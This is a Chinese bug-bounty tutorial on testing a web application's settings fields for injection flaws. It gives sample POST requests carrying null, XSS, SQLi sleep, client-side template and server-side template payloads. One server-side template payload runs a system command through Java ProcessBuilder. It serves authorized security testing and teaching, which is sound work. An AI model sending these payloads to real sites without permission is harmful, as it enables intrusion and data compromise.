漏洞赏金猎人系列-如何测试设置(Setting)功能

sandalwood

原文链接：漏洞赏金猎人系列-如何测试设置(Setting)功能

漏洞赏金猎人系列-如何测试设置(Setting)功能

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

正文

本系列主要讲的是设置这个功能的测试,虽然不同的厂商设置这个功能不太一样,但是大体上是一样的,好了,下面开始(其实我都不想发了,有的东西太过骚气,哈哈)

第一种方法

尝试在电子邮件，用户，密码或电话中注入Null,空值或者%00,响应中可能会发生奇怪的事情

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

email , user , pass OR phone=null&token=CSRF

第二种方法

在用户名中尝试注入 '"><svg/onload=prompt('XSS');>{{7*7}}来检测是否存在SQLi , XSS , SSTI 或者 CSTI

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Content-Length: Number

user , name='"><svg/onload=prompt('XSS');>{{7*7}}& token=CSRF

第三种方法

尝试在用户名中注入SSTI的Payloads: {{7*7}} , {{ '7'*7 }}或者 {{ this }},可能会有一个RCE在等着你==

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

user , name={{7*7}}&token=CSRF

第四种方法

尝试在用户名中注入以下SSTI的Payloads:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance(). getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

可能会有RCE==

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Content-Length: Number

user={{'a'.getClass().forName('javax.script.ScriptEngineManager'). newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"netstat\\\");org.apache.co mmons.io.IOUtils.toString(x.start().getInputStream())\")}} &token=CSRF

第五种方法

尝试在用户名中注入以下CSTI的Payloads:

{{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}

可能会发现一个XSS

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

user , name={{'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)');}}&token=CSRF

第六种方法

尝试在用户名中注入SQLi的payloads,比如' or sleep(20)' , -IF(1=1,SLEEP(20),0) AND id='1 OR ' waitfor delay '0:0:30'--

可能有个高危在等着你哦

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

user , name=' or sleep(20)'&token=CSRF

第七种方法

尝试在用户名中注入XSS的payload：

<svg/onload=alert('XSS')> OR <script>alert(document.domain);</script>

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

user , name=<svg/onload=alert('XSS')>&token=CSRF

参考

https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty

https://verneet.com/fuzzing-77-till-p1/

https://hackerone.com/reports/125980

https://gauravnarwani.com/injecting-6200-to-1200/

https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

https://hackerone.com/reports/587829

https://hackerone.com/reports/150156

https://whitton.io/articles/uber-turning-self-xss-into-good-xss/